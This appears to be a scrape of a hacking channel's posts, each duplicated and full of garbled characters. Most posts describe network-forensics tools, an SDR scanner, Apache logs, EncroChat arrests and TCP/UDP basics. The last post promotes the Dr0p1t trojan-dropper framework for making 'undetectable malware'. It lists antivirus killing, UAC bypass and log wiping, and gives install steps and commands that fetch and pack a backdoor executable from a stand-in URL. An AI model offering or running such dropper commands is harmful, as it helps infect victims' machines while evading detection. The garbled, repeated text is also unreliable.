CTF Series _ Vulnerable Machines.pdf
1.6 MB
The most recommended tutorial- beginers & experts
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦ DNS Hacking Utilities+ Description :
[dnsgram](https://doc.powerdns.com/md/manpages/dnsgram.1/): dnsgram is a debugging tool for intermittent resolver failures. it takes one or more input PCAP files and generates statistics on 5 second segments allowing the study of intermittent resolver issues.
dnsreplay: Dnsreplay takes recorded questions and answers and replays them to the specified nameserver and reporting afterwards which percentage of answers matched, were worse or better. Then compares the answers and some other metrics with the actual ones with those found in the dumpfile.
[dnsscope](https://doc.powerdns.com/md/manpages/dnsscope.1/): dnsscope takes an input PCAP and generates some simple statistics outputs these to console.
dnswasher: dnswasher takes an input file in PCAP format and writes out a PCAP file, while obfuscating end-user IP addresses. This is useful to share data with third parties while attempting to protect the privacy of your users.
ENJOYβ€οΈππ»
β git sources 2020
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦ DNS Hacking Utilities+ Description :
[dnsgram](https://doc.powerdns.com/md/manpages/dnsgram.1/): dnsgram is a debugging tool for intermittent resolver failures. it takes one or more input PCAP files and generates statistics on 5 second segments allowing the study of intermittent resolver issues.
dnsreplay: Dnsreplay takes recorded questions and answers and replays them to the specified nameserver and reporting afterwards which percentage of answers matched, were worse or better. Then compares the answers and some other metrics with the actual ones with those found in the dumpfile.
[dnsscope](https://doc.powerdns.com/md/manpages/dnsscope.1/): dnsscope takes an input PCAP and generates some simple statistics outputs these to console.
dnswasher: dnswasher takes an input file in PCAP format and writes out a PCAP file, while obfuscating end-user IP addresses. This is useful to share data with third parties while attempting to protect the privacy of your users.
ENJOYβ€οΈππ»
β git sources 2020
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦File Extraction-Dumping tools + descriptions
[Chaosreader](https://github.com/brendangregg/Chaosreader): A freeware tool to trace TCP/UDP/... sessions and fetch application data from snoop or tcpdump logs. This is a type of "any-snarf" program, as it will fetch telnet sessions, FTP files, HTTP transfers (HTML, GIF, JPEG, ...), SMTP emails, ... from the captured data inside network traffic logs. A html index file is created that links to all the session details, including realtime replay programs for telnet, rlogin, IRC, X11 and VNC sessions; and reports such as image reports and HTTP GET/POST content reports.
Dsniff: Dsniff is a collection of tools for network auditing and penetration testing. dsniff, filesnarf, mailsnarf, msgsnarf, urlsnarf, and webspy passively monitor a network for interesting data (passwords, e-mail, files, etc.). arpspoof, dnsspoof, and macof facilitate the interception of network traffic normally unavailable to an attacker (e.g, due to layer-2 switching). sshmitm and webmitm implement active monkey-in-the-middle attacks against redirected SSH and HTTPS sessions by exploiting weak bindings in ad-hoc PKI.
[Foremost](http://foremost.sourceforge.net/): is a console program to recover files based on their headers, footers, and internal data structures. This process is commonly referred to as data carving. Foremost can work on image files, such as those generated by dd, Safeback, Encase, etc, or directly on a drive. The headers and footers can be specified by a configuration file or you can use command line switches to specify built-in file types. These built-in types look at the data structures of a given file format allowing for a more reliable and faster recovery.
Justniffer: Justniffer is a network protocol analyzer that captures network traffic and produces logs in a customized way, can emulate Apache web server log files, track response times and extract all "intercepted" files from the HTTP traffic.
[NetworkMiner](http://www.netresec.com/?page=NetworkMiner): NetworkMiner is a Network Forensic Analysis Tool (NFAT) for Windows (but also works in Linux / Mac OS X / FreeBSD). NetworkMiner can be used as a passive network sniffer/packet capturing tool in order to detect operating systems, sessions, hostnames, open ports etc. without putting any traffic on the network. NetworkMiner can also parse PCAP files for off-line analysis and to regenerate/ reassemble transmitted files and certificates from PCAP files.
pcapfex - Packet CAPture Forensic Evidence eXtractor (pcapfex) is a tool that finds and extracts files from packet capture files. Its power lies in its ease of use. Just provide it a pcap file, and it will try to extract all of the files. It is an extensible platform, so additional file types to recognize and extract can be added easily.
[Snort](http://www.snort.org/): is an open source network intrusion prevention and detection system (IDS/IPS) developed by Sourcefire, now owned by Cisco. Combining the benefits of signature, protocol and anomaly- based inspection, Snort is the most widely deployed IDS/IPS technology worldwide.
Tcpick: is a textmode sniffer libpcap-based that can track, reassemble and reorder tcp streams. Tcpick is able to save the captured flows in different files or displays them in the terminal, and so it is useful to sniff files that are transmitted via ftp or http. It can display all the stream on the terminal, when the connection is closed in different display modes like hexdump, hexdump + ascii, only printable characters, raw mode and so on.
ENJOYβ€οΈππ»
β git sources 2020
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦File Extraction-Dumping tools + descriptions
[Chaosreader](https://github.com/brendangregg/Chaosreader): A freeware tool to trace TCP/UDP/... sessions and fetch application data from snoop or tcpdump logs. This is a type of "any-snarf" program, as it will fetch telnet sessions, FTP files, HTTP transfers (HTML, GIF, JPEG, ...), SMTP emails, ... from the captured data inside network traffic logs. A html index file is created that links to all the session details, including realtime replay programs for telnet, rlogin, IRC, X11 and VNC sessions; and reports such as image reports and HTTP GET/POST content reports.
Dsniff: Dsniff is a collection of tools for network auditing and penetration testing. dsniff, filesnarf, mailsnarf, msgsnarf, urlsnarf, and webspy passively monitor a network for interesting data (passwords, e-mail, files, etc.). arpspoof, dnsspoof, and macof facilitate the interception of network traffic normally unavailable to an attacker (e.g, due to layer-2 switching). sshmitm and webmitm implement active monkey-in-the-middle attacks against redirected SSH and HTTPS sessions by exploiting weak bindings in ad-hoc PKI.
[Foremost](http://foremost.sourceforge.net/): is a console program to recover files based on their headers, footers, and internal data structures. This process is commonly referred to as data carving. Foremost can work on image files, such as those generated by dd, Safeback, Encase, etc, or directly on a drive. The headers and footers can be specified by a configuration file or you can use command line switches to specify built-in file types. These built-in types look at the data structures of a given file format allowing for a more reliable and faster recovery.
Justniffer: Justniffer is a network protocol analyzer that captures network traffic and produces logs in a customized way, can emulate Apache web server log files, track response times and extract all "intercepted" files from the HTTP traffic.
[NetworkMiner](http://www.netresec.com/?page=NetworkMiner): NetworkMiner is a Network Forensic Analysis Tool (NFAT) for Windows (but also works in Linux / Mac OS X / FreeBSD). NetworkMiner can be used as a passive network sniffer/packet capturing tool in order to detect operating systems, sessions, hostnames, open ports etc. without putting any traffic on the network. NetworkMiner can also parse PCAP files for off-line analysis and to regenerate/ reassemble transmitted files and certificates from PCAP files.
pcapfex - Packet CAPture Forensic Evidence eXtractor (pcapfex) is a tool that finds and extracts files from packet capture files. Its power lies in its ease of use. Just provide it a pcap file, and it will try to extract all of the files. It is an extensible platform, so additional file types to recognize and extract can be added easily.
[Snort](http://www.snort.org/): is an open source network intrusion prevention and detection system (IDS/IPS) developed by Sourcefire, now owned by Cisco. Combining the benefits of signature, protocol and anomaly- based inspection, Snort is the most widely deployed IDS/IPS technology worldwide.
Tcpick: is a textmode sniffer libpcap-based that can track, reassemble and reorder tcp streams. Tcpick is able to save the captured flows in different files or displays them in the terminal, and so it is useful to sniff files that are transmitted via ftp or http. It can display all the stream on the terminal, when the connection is closed in different display modes like hexdump, hexdump + ascii, only printable characters, raw mode and so on.
ENJOYβ€οΈππ»
β git sources 2020
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - brendangregg/Chaosreader: An any-snarf program that processes application protocols (HTTP/FTP/...) from tcpdump or snoopβ¦
An any-snarf program that processes application protocols (HTTP/FTP/...) from tcpdump or snoop files and stores session and file data - brendangregg/Chaosreader
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦AWESOME HACKING PROJECTS :
[BPF for Ultrix](http://www.tcpdump.org/other/bpfext42.tar.Z): A distribution of BPF for Ultrix 4.2, with both source code and binary modules.
BPF+: Exploiting Global Data-flow Optimization in a Generalized Packet Filter Architecture By Andrew Begel, Steven McCanne, and Susan Graham.
[FFT-FGN-C](http://ita.ee.lbl.gov/html/contrib/fft_fgn_c.html): is a program for synthesizing a type of self-similar process known as fractional Gaussian noise. The program is fast but approximate. Fractional Gaussian noise is only one type of self-similar process. When using this program for synthesizing network traffic, you must keep in mind that it may be that the traffic you seek is better modeled using one of the other processes.
Haka: An open source security oriented language which allows to describe protocols and apply security policies on (live) captured traffic. The scope of Haka language is twofold. First of all, it allows to write security rules in order to filter/alter/drop unwanted packets and log and report malicious activities. Second, Haka features a grammar enabling to specify network protocols and their underlying state machine.
[RIPE-NCC Hadoop for PCAP](https://github.com/RIPE-NCC/hadoop-pcap): A Hadoop library to read packet capture (PCAP) files. Bundles the code used to read PCAPs. Can be used within MapReduce jobs to natively read PCAP files. Also features a Hive Serializer/Deserializer (SerDe) to query PCAPs using SQL like commands.
Traffic Data Repository at the WIDE Project: It becomes increasingly important for both network researchers and operators to know the trend of network traffic and to find anomaly in their network traffic. This paper describes an on-going effort within the WIDE project to collect a set of free tools to build a traffic data repository containing detailed information of our backbone traffic. Traffic traces are collected by tcpdump and, after removing privacy information, the traces are made open to the public. We review the issues on user privacy, and then, the tools used to build the WIDE traffic repository. We will report the current status and findings in the early stage of our IPv6 deployment.
ENJOYβ€οΈππ»
β git sources 2020
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦AWESOME HACKING PROJECTS :
[BPF for Ultrix](http://www.tcpdump.org/other/bpfext42.tar.Z): A distribution of BPF for Ultrix 4.2, with both source code and binary modules.
BPF+: Exploiting Global Data-flow Optimization in a Generalized Packet Filter Architecture By Andrew Begel, Steven McCanne, and Susan Graham.
[FFT-FGN-C](http://ita.ee.lbl.gov/html/contrib/fft_fgn_c.html): is a program for synthesizing a type of self-similar process known as fractional Gaussian noise. The program is fast but approximate. Fractional Gaussian noise is only one type of self-similar process. When using this program for synthesizing network traffic, you must keep in mind that it may be that the traffic you seek is better modeled using one of the other processes.
Haka: An open source security oriented language which allows to describe protocols and apply security policies on (live) captured traffic. The scope of Haka language is twofold. First of all, it allows to write security rules in order to filter/alter/drop unwanted packets and log and report malicious activities. Second, Haka features a grammar enabling to specify network protocols and their underlying state machine.
[RIPE-NCC Hadoop for PCAP](https://github.com/RIPE-NCC/hadoop-pcap): A Hadoop library to read packet capture (PCAP) files. Bundles the code used to read PCAPs. Can be used within MapReduce jobs to natively read PCAP files. Also features a Hive Serializer/Deserializer (SerDe) to query PCAPs using SQL like commands.
Traffic Data Repository at the WIDE Project: It becomes increasingly important for both network researchers and operators to know the trend of network traffic and to find anomaly in their network traffic. This paper describes an on-going effort within the WIDE project to collect a set of free tools to build a traffic data repository containing detailed information of our backbone traffic. Traffic traces are collected by tcpdump and, after removing privacy information, the traces are made open to the public. We review the issues on user privacy, and then, the tools used to build the WIDE traffic repository. We will report the current status and findings in the early stage of our IPv6 deployment.
ENJOYβ€οΈππ»
β git sources 2020
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
Andrewbegel
Andrew Begel β Home Page
A theme for faculty profile page
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Termux-Linux special tool:
A cross platform Python frequency scanning GUI for USB TV dongles, using the OsmoSDR rtl-sdr library.
In other words a cheap, simple Spectrum Analyser.
The scanner attempts to overcome the tuner's frequency response by averaging scans from both the positive and negative frequency offsets of the baseband data.
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1οΈβ£ git clone https://github.com/EarToEarOak/RTLSDR-Scanner.git
2οΈβ£cd RTLSDR-Scanner
3οΈβ£Run 'python -m rtlsdr_scanner'.
4οΈβ£To start a scan simple enter the range at the bottom of the window and click 'Start', after a while a plot of signal strengths should be displayed.
'Dwell' controls how long each step is sampled for, longer times will result in more averaging of the signal.
'Continuous update' updates the display on each step. Caution only use this with small scans and low dwell times, otherwise it will become unresponsive.
'Grid' displays a grid on the scan plot
5οΈβ£File Menu
Open... - Open a saved scan
Save As... - Save a scan
Export... - Export a scan to a CSV file
Properties ... - Scan information
6οΈβ£Edit Menu
Preferences - Set dongle gain, calibration, Local Oscillator (positive offset for upconverters) and sample bands (see below)
Scan Menu
Start - Start a scan
Stop - Stop the scan
Stop at end - Stop the scan when the current sweep is finished (only in continuous mode)
7οΈβ£Tools Menu
Compare - Compare two previously saved scans
Auto Calibration - Perform a crude calibration of the dongle to a known signal (this should be a continuous, unwavering signal)
Tweaking
π¦Tested on:
Windows 7 (x86 and x64)
Windows 8.1 (x64)
Ubuntu 12.04 (x86)
Ubuntu 12.10 (x64)
Ubuntu 13.04 (x64)
Ubuntu 14.04 (x64)
OS X Snow Leopard
OS X Mountain Lion
enjoyβ€οΈππ»
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
π¦Termux-Linux special tool:
A cross platform Python frequency scanning GUI for USB TV dongles, using the OsmoSDR rtl-sdr library.
In other words a cheap, simple Spectrum Analyser.
The scanner attempts to overcome the tuner's frequency response by averaging scans from both the positive and negative frequency offsets of the baseband data.
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1οΈβ£ git clone https://github.com/EarToEarOak/RTLSDR-Scanner.git
2οΈβ£cd RTLSDR-Scanner
3οΈβ£Run 'python -m rtlsdr_scanner'.
4οΈβ£To start a scan simple enter the range at the bottom of the window and click 'Start', after a while a plot of signal strengths should be displayed.
'Dwell' controls how long each step is sampled for, longer times will result in more averaging of the signal.
'Continuous update' updates the display on each step. Caution only use this with small scans and low dwell times, otherwise it will become unresponsive.
'Grid' displays a grid on the scan plot
5οΈβ£File Menu
Open... - Open a saved scan
Save As... - Save a scan
Export... - Export a scan to a CSV file
Properties ... - Scan information
6οΈβ£Edit Menu
Preferences - Set dongle gain, calibration, Local Oscillator (positive offset for upconverters) and sample bands (see below)
Scan Menu
Start - Start a scan
Stop - Stop the scan
Stop at end - Stop the scan when the current sweep is finished (only in continuous mode)
7οΈβ£Tools Menu
Compare - Compare two previously saved scans
Auto Calibration - Perform a crude calibration of the dongle to a known signal (this should be a continuous, unwavering signal)
Tweaking
π¦Tested on:
Windows 7 (x86 and x64)
Windows 8.1 (x64)
Ubuntu 12.04 (x86)
Ubuntu 12.10 (x64)
Ubuntu 13.04 (x64)
Ubuntu 14.04 (x64)
OS X Snow Leopard
OS X Mountain Lion
enjoyβ€οΈππ»
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
GitHub
GitHub - EarToEarOak/RTLSDR-Scanner: A cross platform Python frequency scanning GUI for the OsmoSDR rtl-sdr library
A cross platform Python frequency scanning GUI for the OsmoSDR rtl-sdr library - GitHub - EarToEarOak/RTLSDR-Scanner: A cross platform Python frequency scanning GUI for the OsmoSDR rtl-sdr library
β β β Uππ»βΊπ«6π¬πβ β β β
π¦Types of Apache Logs
Different types of Apache logs are controlled by different web server modules and have different control directives and the ability to specify the format of the log line.
π¦The following types of Apache web server logs are available:
Server error log is the most important log file. This is where Apache httpd will send diagnostic information and record any errors it encounters while processing requests. This is the first place to look when there is a problem with the server starting up or the server working, as it often contains details about what went wrong and how to fix it.
2οΈβ£Per-module logging
The LogLevel directive allows you to specify the log severity level for each module. Thus, if you fix the problem with only one specific module, you can increase its volume in the journal, while not receiving unnecessary information about other modules that do not interest you. This is especially useful for modules like mod_proxy or mod_rewrite where you want to know the details of what it is trying to do.
3οΈβ£Access Log
The server access log records all requests processed by the server.
4οΈβ£Additional configurable debug logging
This directive causes a custom message to be logged in the error log. A message can use variables and functions from ap_expr syntax. Links to HTTP headers do not add header names to the Vary header. Messages are logged.
5οΈβ£Forensic (forensic logs)
Registration is carried out before and after processing the request, so the forensic journal contains two journal lines for each request. Differs in the increased severity.
6οΈβ£CGI Script Execution Logs
If ScriptLog is not specified, an error log is not generated. If ScriptLog is installed, then any CGI errors are logged in the file specified as an argument.
written by
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
π¦Types of Apache Logs
Different types of Apache logs are controlled by different web server modules and have different control directives and the ability to specify the format of the log line.
π¦The following types of Apache web server logs are available:
Error Log1οΈβ£Error Log
Per-module logging
Access Log
Additional configurable debug logging
Forensic (forensic logs)
CGI Script Execution Logs
Server error log is the most important log file. This is where Apache httpd will send diagnostic information and record any errors it encounters while processing requests. This is the first place to look when there is a problem with the server starting up or the server working, as it often contains details about what went wrong and how to fix it.
2οΈβ£Per-module logging
The LogLevel directive allows you to specify the log severity level for each module. Thus, if you fix the problem with only one specific module, you can increase its volume in the journal, while not receiving unnecessary information about other modules that do not interest you. This is especially useful for modules like mod_proxy or mod_rewrite where you want to know the details of what it is trying to do.
3οΈβ£Access Log
The server access log records all requests processed by the server.
4οΈβ£Additional configurable debug logging
This directive causes a custom message to be logged in the error log. A message can use variables and functions from ap_expr syntax. Links to HTTP headers do not add header names to the Vary header. Messages are logged.
5οΈβ£Forensic (forensic logs)
Registration is carried out before and after processing the request, so the forensic journal contains two journal lines for each request. Differs in the increased severity.
6οΈβ£CGI Script Execution Logs
If ScriptLog is not specified, an error log is not generated. If ScriptLog is installed, then any CGI errors are logged in the file specified as an argument.
written by
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
β β β Uππ»βΊπ«6π¬πβ β β β
π¦British police arrest 746 criminals after cracking encrypted information on EncroChat
#News
>The National Anti-Crime Agency (NCA) announced that 746 people have been arrested after the information on EncroChat was intercepted and decrypted. According to the NCA, there are some iconic criminal leaders among the arrested. So far, the operation has seized a total of 54 million pounds, 77 firearms, two tons of drugs, 55 high-value cars and 73 luxury watches.
>After the European partners made a breakthrough in decrypting the encrypted messenger application EncroChat, this arrest, code-named Operation Venice, became possible. Since 2016, the United Kingdom's National Anti-Crime Bureau has been working with other law enforcement agencies around the world to crack the application's encryption. Two months ago, its partners in France and the Netherlands successfully infiltrated the platform and passed the discovered information to Europol. Thanks to this breakthrough, European law enforcement agencies also targeted criminals in their respective countries.
> According to the UK National Crime Prevention Bureau, EncroChat is operated by criminals outside the UK, making it more difficult to get started. NCA said that behind-the-scenes personnel of EncroChat realized that the application was compromised on June 13 and issued a warning to users to remind them to throw away their phones to reduce the possibility of arrest.
> The EncroChat application is usually loaded on uniquely modified smartphones, which cost about Β£1,500 and the contract period is 6 months. These mobile phones have instant messaging applications that can make VoIP calls and provide remote data self-destruction. Since Europol has intercepted this information, this security mechanism will not help criminals using these devices.
#News
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
π¦British police arrest 746 criminals after cracking encrypted information on EncroChat
#News
>The National Anti-Crime Agency (NCA) announced that 746 people have been arrested after the information on EncroChat was intercepted and decrypted. According to the NCA, there are some iconic criminal leaders among the arrested. So far, the operation has seized a total of 54 million pounds, 77 firearms, two tons of drugs, 55 high-value cars and 73 luxury watches.
>After the European partners made a breakthrough in decrypting the encrypted messenger application EncroChat, this arrest, code-named Operation Venice, became possible. Since 2016, the United Kingdom's National Anti-Crime Bureau has been working with other law enforcement agencies around the world to crack the application's encryption. Two months ago, its partners in France and the Netherlands successfully infiltrated the platform and passed the discovered information to Europol. Thanks to this breakthrough, European law enforcement agencies also targeted criminals in their respective countries.
> According to the UK National Crime Prevention Bureau, EncroChat is operated by criminals outside the UK, making it more difficult to get started. NCA said that behind-the-scenes personnel of EncroChat realized that the application was compromised on June 13 and issued a warning to users to remind them to throw away their phones to reduce the possibility of arrest.
> The EncroChat application is usually loaded on uniquely modified smartphones, which cost about Β£1,500 and the contract period is 6 months. These mobile phones have instant messaging applications that can make VoIP calls and provide remote data self-destruction. Since Europol has intercepted this information, this security mechanism will not help criminals using these devices.
#News
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦The question may arise, why is such an unreliable UDP protocol needed if there is a reliable TCP protocol?
#FastTips
> The payoff for the reliability of the TCP protocol is what accounting calls βoverheadsβ - the bottom line is that to provide a mechanism for controlling packet delivery in TCP, a lot of data is sent that does not contain useful information, but only serves to install and connection control. For example, to send at least one packet with useful data to TCP, you need to complete a three-stage handshake, which consists in sending 1 special packet from source to destination, receiving 1 packet about the possibility of establishing connections and sending another 1 special packet from the source with confirmation,
> For this reason, both TCP and UDP are βgoodβ - it is important to use them correctly. For example, when streaming video, it does not matter which packet was lost a second or two ago. But when opening a web page, when incomplete data may cause problems with processing the request from the HTTP protocol, on the contrary, you need to monitor the delivery and integrity of each data packet.
>A detailed understanding of TCP and UDP matters when:
1) network traffic analysis
2) configure iptables network firewall
3) understanding and protecting against DoS attacks of some kind.
> For example, understanding the TCP connection mechanism, you can configure the iptables so that all new connections will be prohibited while preserving the existing ones, or you can prohibit any incoming connections with full outgoing permission, understand and prevent a number of DoS attacks, understand SYN and other types of scans - why are they possible and what is their mechanism, etc ..
written by undercode
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦The question may arise, why is such an unreliable UDP protocol needed if there is a reliable TCP protocol?
#FastTips
> The payoff for the reliability of the TCP protocol is what accounting calls βoverheadsβ - the bottom line is that to provide a mechanism for controlling packet delivery in TCP, a lot of data is sent that does not contain useful information, but only serves to install and connection control. For example, to send at least one packet with useful data to TCP, you need to complete a three-stage handshake, which consists in sending 1 special packet from source to destination, receiving 1 packet about the possibility of establishing connections and sending another 1 special packet from the source with confirmation,
> For this reason, both TCP and UDP are βgoodβ - it is important to use them correctly. For example, when streaming video, it does not matter which packet was lost a second or two ago. But when opening a web page, when incomplete data may cause problems with processing the request from the HTTP protocol, on the contrary, you need to monitor the delivery and integrity of each data packet.
>A detailed understanding of TCP and UDP matters when:
1) network traffic analysis
2) configure iptables network firewall
3) understanding and protecting against DoS attacks of some kind.
> For example, understanding the TCP connection mechanism, you can configure the iptables so that all new connections will be prohibited while preserving the existing ones, or you can prohibit any incoming connections with full outgoing permission, understand and prevent a number of DoS attacks, understand SYN and other types of scans - why are they possible and what is their mechanism, etc ..
written by undercode
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦some missed tips in linux :
#FastTips
1) Unsuccessful distribution base
The basis is taken Xubuntu, that is, in fact, Ubuntu. If you installed the latest versions of Ubuntu, you might have noticed how many shortcuts there are for different cloud services that most do not need. It seems that this is Windows, which runs a virus that has installed a couple of dozen shortcuts.
> It got to the point that Linux Mint (based on Ubuntu) BLOCKS the Snap installation (developed by Canonical Ltd.), which behaves like a real trojan - it installs hidden, overwrites part of the packages secretly, and secretly connects to remote servers. This was said last year ( https://blog.linuxmint.com/?p=3766 ) and was repeated again in this ( https://blog.linuxmint.com/?p=3906 ).
> My personal use of Ubuntu evoked only negative emotions. Constantly occurring errors and the proposal to send a report - I already had a similar OS, it was called Windows '98.
2) Unsuccessful tuning of the desktop environment
The distribution uses XFCE, but it is made to look like GNOME 3. Result: it is almost impossible to find and open a minimized application. In general, the feeling of the desktop: "Ponte is more expensive than usability."
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦some missed tips in linux :
#FastTips
1) Unsuccessful distribution base
The basis is taken Xubuntu, that is, in fact, Ubuntu. If you installed the latest versions of Ubuntu, you might have noticed how many shortcuts there are for different cloud services that most do not need. It seems that this is Windows, which runs a virus that has installed a couple of dozen shortcuts.
> It got to the point that Linux Mint (based on Ubuntu) BLOCKS the Snap installation (developed by Canonical Ltd.), which behaves like a real trojan - it installs hidden, overwrites part of the packages secretly, and secretly connects to remote servers. This was said last year ( https://blog.linuxmint.com/?p=3766 ) and was repeated again in this ( https://blog.linuxmint.com/?p=3906 ).
> My personal use of Ubuntu evoked only negative emotions. Constantly occurring errors and the proposal to send a report - I already had a similar OS, it was called Windows '98.
2) Unsuccessful tuning of the desktop environment
The distribution uses XFCE, but it is made to look like GNOME 3. Result: it is almost impossible to find and open a minimized application. In general, the feeling of the desktop: "Ponte is more expensive than usability."
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Create an undetectable malware :
Have you ever heard about trojan droppers ? In short dropper is type of malware that downloads other malwares and Dr0p1t gives you the chance to create a stealthy dropper that bypass most AVs and have a lot of tricks ( Trust me :D ) ;)
π¦FEATURES :
The executable size is smaller compared to other droppers generated the same way.
Download executable on target system and execute it silently..
Self destruct function so that the dropper will kill and delete itself after finishing it work
Escape disk forensics by making all the files dropper create and
dropper also cleans its content before deletion
Clear event log after finishing.
Works with Windows, Linux and now have OSX support
Dr0p1t-Server feature (beta) so now you can work from browser See how to work with Dr0p1t-Server
Dr0p1t-Server have a scam option (beta) See how to work with Dr0p1t-Server
Find and kill antivirus before running the malware.
The ability to disable UAC.
The ability to run your malware as admin.
Full spoof by spoofing the file icon and extension to any thing you want.
ZIP files support so now you can compress your executable to zip file before uploading.
Running a custom ( batch|powershell|vbs ) file you have chosen before running the executable
In running powershell scripts it can bypass execution policy
Using UPX to compress the dropper after creating it
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
./Dr0p1t.py Malware_Url [Options]
./Dr0p1t.py https://test.com/backdoor.exe -s -t -a -k --runas --upx
./Dr0p1t.py https://test.com/backdoor.exe -k -b block_online_scan.bat --only32
./Dr0p1t.py https://test.com/backdoor.exe -s -t -k -p Enable_PSRemoting.ps1 --runas
./Dr0p1t.py https://test.com/backdoor.zip -t -k --nouac -i flash.ico --spoof pdf --zip
ENJOYβ€οΈππ»
β topic git sources
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Create an undetectable malware :
Have you ever heard about trojan droppers ? In short dropper is type of malware that downloads other malwares and Dr0p1t gives you the chance to create a stealthy dropper that bypass most AVs and have a lot of tricks ( Trust me :D ) ;)
π¦FEATURES :
The executable size is smaller compared to other droppers generated the same way.
Download executable on target system and execute it silently..
Self destruct function so that the dropper will kill and delete itself after finishing it work
Escape disk forensics by making all the files dropper create and
dropper also cleans its content before deletion
Clear event log after finishing.
Works with Windows, Linux and now have OSX support
Dr0p1t-Server feature (beta) so now you can work from browser See how to work with Dr0p1t-Server
Dr0p1t-Server have a scam option (beta) See how to work with Dr0p1t-Server
Find and kill antivirus before running the malware.
The ability to disable UAC.
The ability to run your malware as admin.
Full spoof by spoofing the file icon and extension to any thing you want.
ZIP files support so now you can compress your executable to zip file before uploading.
Running a custom ( batch|powershell|vbs ) file you have chosen before running the executable
In running powershell scripts it can bypass execution policy
Using UPX to compress the dropper after creating it
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1οΈβ£git clone https://github.com/D4Vinci/Dr0p1t-Framework.git7οΈβ£Examples :
2οΈβ£chmod 777 -R Dr0p1t-Framework
3οΈβ£cd Dr0p1t-Framework
4οΈβ£sudo chmod +x install.sh
5οΈβ£./install.sh
6οΈβ£python Dr0p1t.py
./Dr0p1t.py Malware_Url [Options]
./Dr0p1t.py https://test.com/backdoor.exe -s -t -a -k --runas --upx
./Dr0p1t.py https://test.com/backdoor.exe -k -b block_online_scan.bat --only32
./Dr0p1t.py https://test.com/backdoor.exe -s -t -k -p Enable_PSRemoting.ps1 --runas
./Dr0p1t.py https://test.com/backdoor.zip -t -k --nouac -i flash.ico --spoof pdf --zip
ENJOYβ€οΈππ»
β topic git sources
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β